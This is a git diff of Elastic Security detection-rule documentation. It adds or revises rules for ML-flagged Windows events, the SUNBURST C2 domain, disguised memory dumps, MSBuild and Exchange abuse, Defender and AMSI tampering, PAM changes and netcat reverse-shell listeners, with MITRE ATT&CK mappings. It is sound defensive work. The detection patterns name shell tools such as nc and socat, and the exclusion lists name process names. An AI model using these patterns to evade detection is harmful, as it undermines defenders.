+** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc new file mode 100644 index 0000000000..19ce3ca0a7 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc @@ -0,0 +1,78 @@ +[[machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity]] +=== Machine Learning Detected a Suspicious Windows Event Predicted to be Malicious Activity + +A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-endpoint.events.process-* +* winlogbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* OS: Windows +* Data Source: Elastic Endgame +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where (problemchild.prediction == 1 or blocklist_label == 1) and not process.args : ("*C:\\WINDOWS\\temp\\nessus_*.txt*", "*C:\\WINDOWS\\temp\\nessus_*.tmp*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade Task or Service +** ID: T1036.004 +** Reference URL: https://attack.mitre.org/techniques/T1036/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc new file mode 100644 index 0000000000..47effc8ae7 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc @@ -0,0 +1,79 @@ +[[machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score]] +=== Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score + +A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-endpoint.events.process-* +* winlogbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* OS: Windows +* Data Source: Elastic Endgame +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where ((problemchild.prediction == 1 and problemchild.prediction_probability > 0.98) or +blocklist_label == 1) and not process.args : ("*C:\\WINDOWS\\temp\\nessus_*.txt*", "*C:\\WINDOWS\\temp\\nessus_*.tmp*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade Task or Service +** ID: T1036.004 +** Reference URL: https://attack.mitre.org/techniques/T1036/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc new file mode 100644 index 0000000000..13397d4551 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc @@ -0,0 +1,77 @@ +[[machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain]] +=== Machine Learning Detected DGA activity using a known SUNBURST DNS domain + +A supervised machine learning model has identified a DNS question name that used by the SUNBURST malware and is predicted to be the result of a Domain Generation Algorithm. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* logs-network_traffic.* + +*Severity*: critical + +*Risk score*: 99 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Domain: Network +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +ml_is_dga.malicious_prediction:1 and dns.question.registered_domain:avsvmcloud.com + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/memory-dump-file-with-unusual-extension.asciidoc b/docs/detections/prebuilt-rules/rule-details/memory-dump-file-with-unusual-extension.asciidoc new file mode 100644 index 0000000000..469c45d68f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/memory-dump-file-with-unusual-extension.asciidoc @@ -0,0 +1,86 @@ +[[memory-dump-file-with-unusual-extension]] +=== Memory Dump File with Unusual Extension + +Identifies the creation of a memory dump file with an unusual extension, which can indicate an attempt to disguise a memory dump as another file type to bypass security defenses. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Rule Type: BBR + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "creation" and + + /* MDMP header */ + file.Ext.header_bytes : "4d444d50*" and + not file.extension : ("dmp", "mdmp", "hdmp", "edmp", "full", "tdref", "cg", "tmp", "dat") and + not + ( + process.executable : "?:\\Program Files\\Endgame\\esensor.exe" and + process.code_signature.trusted == true and length(file.extension) == 0 + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: LSASS Memory +** ID: T1003.001 +** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade File Type +** ID: T1036.008 +** Reference URL: https://attack.mitre.org/techniques/T1036/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-an-unusual-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-an-unusual-process.asciidoc index 06b94e1cda..50a645e12a 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-an-unusual-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-an-unusual-process.asciidoc @@ -34,7 +34,7 @@ An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script * Tactic: Execution * Data Source: Elastic Defend -*Version*: 206 +*Version*: 207 *Rule authors*: @@ -75,3 +75,11 @@ process.name.caseless:("csc.exe" or "iexplore.exe" or "powershell.exe") ** Name: Compile After Delivery ** ID: T1027.004 ** Reference URL: https://attack.mitre.org/techniques/T1027/004/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-by-a-script-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-by-a-script-process.asciidoc index 22650ee22a..287b1c2fa8 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-by-a-script-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-started-by-a-script-process.asciidoc @@ -32,7 +32,7 @@ An instance of MSBuild, the Microsoft Build Engine, was started by a script or t * Tactic: Execution * Data Source: Elastic Defend -*Version*: 205 +*Version*: 206 *Rule authors*: @@ -71,3 +71,19 @@ host.os.type:windows and event.category:process and event.type:start and ( ** Name: Execution ** ID: TA0002 ** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-using-an-alternate-name.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-using-an-alternate-name.asciidoc index 544bcb3e84..3cf9f375b3 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-using-an-alternate-name.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-build-engine-using-an-alternate-name.asciidoc @@ -35,7 +35,7 @@ An instance of MSBuild, the Microsoft Build Engine, was started after being rena * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 108 +*Version*: 109 *Rule authors*: @@ -125,3 +125,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Rename System Utilities ** ID: T1036.003 ** Reference URL: https://attack.mitre.org/techniques/T1036/003/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc index 72f6932cec..e0eac8fbe2 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc @@ -33,11 +33,12 @@ Identifies suspicious processes being spawned by the Microsoft Exchange Server U * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access +* Tactic: Lateral Movement * Data Source: Elastic Endgame * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -81,3 +82,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Exploit Public-Facing Application ** ID: T1190 ** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-writing-suspicious-files.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-writing-suspicious-files.asciidoc index bab58a1888..1ff960af2d 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-writing-suspicious-files.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-server-um-writing-suspicious-files.asciidoc @@ -33,11 +33,12 @@ Identifies suspicious files being written by the Microsoft Exchange Server Unifi * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access +* Tactic: Lateral Movement * Data Source: Elastic Endgame * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -93,3 +94,11 @@ file where host.os.type == "windows" and event.type == "creation" and ** Name: Exploit Public-Facing Application ** ID: T1190 ** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-worker-spawning-suspicious-processes.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-worker-spawning-suspicious-processes.asciidoc index 314da0871e..654b476000 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-worker-spawning-suspicious-processes.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-exchange-worker-spawning-suspicious-processes.asciidoc @@ -34,10 +34,11 @@ Identifies suspicious processes being spawned by the Microsoft Exchange Server w * OS: Windows * Use Case: Threat Detection * Tactic: Initial Access +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -76,3 +77,19 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Exploit Public-Facing Application ** ID: T1190 ** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-windows-defender-tampering.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-windows-defender-tampering.asciidoc index a3d790f3a8..203622204a 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-windows-defender-tampering.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-windows-defender-tampering.asciidoc @@ -41,7 +41,7 @@ Identifies when one or more features on Microsoft Defender are disabled. Adversa * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -140,3 +140,7 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" ** Name: Impair Defenses ** ID: T1562 ** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/modification-of-amsienable-registry-key.asciidoc b/docs/detections/prebuilt-rules/rule-details/modification-of-amsienable-registry-key.asciidoc index 10dd0fc8e6..114d271554 100644 --- a/docs/detections/prebuilt-rules/rule-details/modification-of-amsienable-registry-key.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/modification-of-amsienable-registry-key.asciidoc @@ -37,7 +37,7 @@ Identifies modifications of the AmsiEnable registry key to 0, which disables the * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -131,3 +131,7 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" ** Name: Disable or Modify Tools ** ID: T1562.001 ** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/modification-of-dynamic-linker-preload-shared-object.asciidoc b/docs/detections/prebuilt-rules/rule-details/modification-of-dynamic-linker-preload-shared-object.asciidoc index 2997ba75d2..c2570c0803 100644 --- a/docs/detections/prebuilt-rules/rule-details/modification-of-dynamic-linker-preload-shared-object.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/modification-of-dynamic-linker-preload-shared-object.asciidoc @@ -3,7 +3,7 @@ Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries. -*Rule type*: query +*Rule type*: new_terms *Rule indices*: @@ -34,7 +34,7 @@ Identifies modification of the dynamic linker preload shared object (ld.so.prelo * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 207 *Rule authors*: @@ -48,8 +48,8 @@ Identifies modification of the dynamic linker preload shared object (ld.so.prelo [source, js] ---------------------------------- -event.category:file and host.os.type:linux and not event.type:deletion and file.path:/etc/ld.so.preload and -event.action:(updated or renamed or rename) +host.os.type:linux and event.category:file and event.action:(updated or renamed or rename) and +not event.type:deletion and file.path:/etc/ld.so.preload ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/modification-of-openssh-binaries.asciidoc b/docs/detections/prebuilt-rules/rule-details/modification-of-openssh-binaries.asciidoc index a61b106d52..5ffcfe3044 100644 --- a/docs/detections/prebuilt-rules/rule-details/modification-of-openssh-binaries.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/modification-of-openssh-binaries.asciidoc @@ -36,7 +36,7 @@ Adversaries may modify SSH related binaries for persistence or credential access * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -56,7 +56,8 @@ event.category:file and host.os.type:linux and event.type:change and /usr/bin/sftp or /usr/bin/ssh or /usr/sbin/sshd) or - file.name:libkeyutils.so) + file.name:libkeyutils.so) and + not process.executable:/usr/share/elasticsearch/* ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/modification-of-standard-authentication-module-or-configuration.asciidoc b/docs/detections/prebuilt-rules/rule-details/modification-of-standard-authentication-module-or-configuration.asciidoc index baabbae692..4cab1d0430 100644 --- a/docs/detections/prebuilt-rules/rule-details/modification-of-standard-authentication-module-or-configuration.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/modification-of-standard-authentication-module-or-configuration.asciidoc @@ -3,7 +3,7 @@ Adversaries may modify the standard authentication module for persistence via patching the normal authorization process or modifying the login configuration to allow unauthorized access or elevate privileges. -*Rule type*: query +*Rule type*: new_terms *Rule indices*: @@ -37,7 +37,7 @@ Adversaries may modify the standard authentication module for persistence via pa * Tactic: Persistence * Data Source: Elastic Defend -*Version*: 104 +*Version*: 204 *Rule authors*: @@ -57,19 +57,11 @@ event.category:file and event.type:change and (* and not ( - /bin/yum or - "/usr/sbin/pam-auth-update" or /usr/libexec/packagekitd or - /usr/bin/dpkg or /usr/bin/vim or /usr/libexec/xpcproxy or /usr/bin/bsdtar or /usr/local/bin/brew or - /usr/bin/rsync or - /usr/bin/yum or - /var/lib/docker/*/bin/yum or - /var/lib/docker/*/bin/dpkg or - ./merged/var/lib/docker/*/bin/dpkg or "/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service" ) ) and @@ -79,6 +71,12 @@ event.category:file and event.type:change and /tmp/newroot/lib/*/pam_*.so or /private/var/folders/*/T/com.apple.fileprovider.ArchiveService/TemporaryItems/*/lib/security/pam_*.so or /tmp/newroot/usr/lib64/security/pam_*.so + ) and + not process.name: + ( + yum or dnf or rsync or platform-python or authconfig or rpm or pdkg or apk or dnf-automatic or btrfs or + dpkg or pam-auth-update or steam or platform-python3.6 or pam-config or microdnf or yum_install or yum-cron or + systemd or containerd or pacman ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/modification-of-the-mspkiaccountcredentials.asciidoc b/docs/detections/prebuilt-rules/rule-details/modification-of-the-mspkiaccountcredentials.asciidoc index 5180cb24a0..dbbf3da1b5 100644 --- a/docs/detections/prebuilt-rules/rule-details/modification-of-the-mspkiaccountcredentials.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/modification-of-the-mspkiaccountcredentials.asciidoc @@ -36,7 +36,7 @@ Identify the modification of the msPKIAccountCredentials attribute in an Active * Tactic: Privilege Escalation * Use Case: Active Directory Monitoring -*Version*: 6 +*Version*: 7 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/modification-or-removal-of-an-okta-application-sign-on-policy.asciidoc b/docs/detections/prebuilt-rules/rule-details/modification-or-removal-of-an-okta-application-sign-on-policy.asciidoc index 28ecb3ab7d..dede3f41ae 100644 --- a/docs/detections/prebuilt-rules/rule-details/modification-or-removal-of-an-okta-application-sign-on-policy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/modification-or-removal-of-an-okta-application-sign-on-policy.asciidoc @@ -33,7 +33,7 @@ Detects attempts to modify or delete a sign on policy for an Okta application. A * Use Case: Identity and Access Audit * Data Source: Okta -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/namespace-manipulation-using-unshare.asciidoc b/docs/detections/prebuilt-rules/rule-details/namespace-manipulation-using-unshare.asciidoc index f01051bc27..ad4395478c 100644 --- a/docs/detections/prebuilt-rules/rule-details/namespace-manipulation-using-unshare.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/namespace-manipulation-using-unshare.asciidoc @@ -35,7 +35,7 @@ Identifies suspicious usage of unshare to manipulate system namespaces. Unshare * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 6 +*Version*: 7 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/netcat-listener-established-via-rlwrap.asciidoc b/docs/detections/prebuilt-rules/rule-details/netcat-listener-established-via-rlwrap.asciidoc new file mode 100644 index 0000000000..60d1aec70a --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/netcat-listener-established-via-rlwrap.asciidoc @@ -0,0 +1,66 @@ +[[netcat-listener-established-via-rlwrap]] +=== Netcat Listener Established via rlwrap + +Monitors for the execution of a netcat listener via rlwrap. rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. This utility can be used in conjunction with netcat to gain a more stable reverse shell. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "rlwrap" and process.args in ( + "nc", "ncat", "netcat", "nc.openbsd", "socat" +) and process.args : "*l*" and process.args_count >= 4 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/network-activity-detected-via-cat.asciidoc b/docs/detections/prebuilt-rules/rule-details/network-activity-detected-via-cat.asciidoc index 735d09370c..4e0cbccd8f 100644 --- a/docs/detections/prebuilt-rules/rule-details/network-activity-detected-via-cat.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/network-activity-detected-via-cat.asciidoc @@ -29,7 +29,7 @@ This rule monitors for the execution of the cat command, followed by a connectio * Tactic: Command and Control * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -44,10 +44,10 @@ This rule monitors for the execution of the cat command, followed by a connectio [source, js] ---------------------------------- sequence by host.id, process.entity_id with maxspan=1s - [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and - process.name == "cat"] - [network where host.os.type == "linux" and event.action in ("connection_attempted", "disconnect_received") and - process.name == "cat"] + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and process.name == "cat" and + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] + [network where host.os.type == "linux" and event.action in ("connection_attempted", "disconnect_received") and process.name == "cat" and + destination.ip != null and not cidrmatch(destination.ip, "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4", "::1")] ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/network-connection-via-recently-compiled-executable.asciidoc b/docs/detections/prebuilt-rules/rule-details/network-connection-via-recently-compiled-executable.asciidoc index 279a16e421..2a4075e5df 100644 --- a/docs/detections/prebuilt-rules/rule-details/network-connection-via-recently-compiled-executable.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/network-connection-via-recently-compiled-executable.asciidoc @@ -29,7 +29,7 @@ This rule monitors a sequence involving a program compilation event followed by * Tactic: Execution * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/network-connection-via-registration-utility.asciidoc b/docs/detections/prebuilt-rules/rule-details/network-connection-via-registration-utility.asciidoc index da11bf5c78..aa8caba6a7 100644 --- a/docs/detections/prebuilt-rules/rule-details/network-connection-via-registration-utility.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/network-connection-via-registration-utility.asciidoc @@ -31,10 +31,11 @@ Identifies the native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -140,6 +141,10 @@ sequence by process.entity_id ** ID: T1218 ** Reference URL: https://attack.mitre.org/techniques/T1218/ * Sub-technique: +** Name: Regsvcs/Regasm +** ID: T1218.009 +** Reference URL: https://attack.mitre.org/techniques/T1218/009/ +* Sub-technique: ** Name: Regsvr32 ** ID: T1218.010 ** Reference URL: https://attack.mitre.org/techniques/T1218/010/ diff --git a/docs/detections/prebuilt-rules/rule-details/network-connection-via-signed-binary.asciidoc b/docs/detections/prebuilt-rules/rule-details/network-connection-via-signed-binary.asciidoc index 12168d0cfc..a6c46ab537 100644 --- a/docs/detections/prebuilt-rules/rule-details/network-connection-via-signed-binary.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/network-connection-via-signed-binary.asciidoc @@ -34,7 +34,7 @@ Binaries signed with trusted digital certificates can execute on Windows systems * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -132,7 +132,3 @@ sequence by process.entity_id ** Name: System Binary Proxy Execution ** ID: T1218 ** Reference URL: https://attack.mitre.org/techniques/T1218/ -* Tactic: -** Name: Execution -** ID: TA0002 -** Reference URL: https://attack.mitre.org/tactics/TA0002/ diff --git a/docs/detections/prebuilt-rules/rule-details/network-level-authentication-nla-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/network-level-authentication-nla-disabled.asciidoc index ce655b613c..49104d6902 100644 --- a/docs/detections/prebuilt-rules/rule-details/network-level-authentication-nla-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/network-level-authentication-nla-disabled.asciidoc @@ -34,7 +34,7 @@ Identifies the attempt to disable Network-Level Authentication (NLA) via registr * Data Source: Elastic Endgame * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -66,3 